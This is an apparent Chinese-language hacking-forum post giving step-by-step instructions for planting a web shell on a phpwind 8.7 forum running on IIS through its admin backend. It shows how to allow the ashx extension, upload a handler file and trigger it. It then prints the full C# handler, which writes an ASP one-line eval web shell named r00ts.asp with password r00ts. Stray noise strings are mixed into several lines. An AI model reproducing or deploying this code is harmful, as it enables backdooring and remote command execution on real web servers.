phpwind 8.7 后台拿shell

admin

首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
1 o; @% p6 X% {& E, S- A+ d
7 c# r- z  }1 Y( X3 |( c$ K, c群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx

6 X5 O# e3 |# g% I: ?! F发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
) q) C, u/ U5 {/ V) n
0 N9 M" a  P/ Z2 a! |然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
& ~$ m' F* E+ j0 _! Y; a" S
- Z1 i6 M; a8 ?; G8 [3 z打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
9 q8 V9 J4 W. b6 J( l+ w) U: w
; ~7 p" l" c# Y: p下面是代码:
& {2 t" }& S6 a8 h3 [% F
4 q6 l9 M2 U0 Z% l7 ?$ X! ?) ?+ i<%@ WebHandler Language="C#"Class="Handler" %>
using System;
% W8 }) T" J6 R- s$ ~1 Ausing System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
: i- d1 D8 \$ {( n) X, x% KStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
file1.Write("<%eval request(\"r00ts\")%>");
file1.Flush();
0 I0 X- o5 ?# a3 |file1.Close();
}
public bool IsReusable {
get {
return false;
1 W, V& y$ h9 ?2 Y+ h& a% i}
}
}
! N7 i. G9 U5 I4 O